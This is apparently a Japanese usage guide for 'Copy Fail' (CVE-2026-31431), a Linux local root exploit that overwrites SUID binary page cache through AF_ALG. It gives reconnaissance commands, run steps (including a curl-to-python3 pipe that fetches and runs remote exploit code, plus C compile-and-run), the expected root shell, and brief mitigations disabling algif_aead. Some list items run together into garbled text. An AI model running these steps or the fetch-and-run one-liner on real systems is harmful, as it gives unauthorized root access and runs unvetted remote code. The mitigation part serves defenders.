
Linux のローカル権限昇格エクスプロイトで、CVE-2026-31431 に対応し、AF_ALG カーネル暗号 API を介して SUID バイナリのページキャッシュを上書きすることで root 権限を取得します。
このコンテンツは教育および許可されたセキュリティテストのみを目的としています。明示的な許可なくシステム上でこれを実行しないでください。
Copy Fail (CVE-2026-31431) は、AF_ALG を介してカーネル暗号APIに影響を与えるLinuxのローカル特権昇格(LPE)脆弱性です。
これにより、非特権ユーザーがSUIDバイナリ(例: /usr/bin/su)のページキャッシュデータを上書きし、rootアクセスを取得できます。
AF_ALG が有効algif_aead モジュールがロード済みos.splicesocket(AF_ALG)uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
期待される指標:
authencesn(hmac(sha256),cbc(aes))algif_aead がロード済みpython3 copy_fail_exp.py
curl https://copy.fail/exp | python3
su
id
期待される結果:
uid=0(root)
os.splice not found原因:
解決策:
gcc copy_fail_exp.c -o copy_fail
chmod +x copy_fail
./copy_fail
su
考えられる原因:
必要なツールをインストール:
apt update && apt install build-essential
dmesg | grep -i alg
lsmod | grep algif_aead
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
システムを更新:
apt update && apt upgrade
エクスプロイトが失敗した場合、以下を検討:
このエクスプロイトは、ラボ、CTF、および許可されたペネトレーションテストでのみ責任を持って使用してください。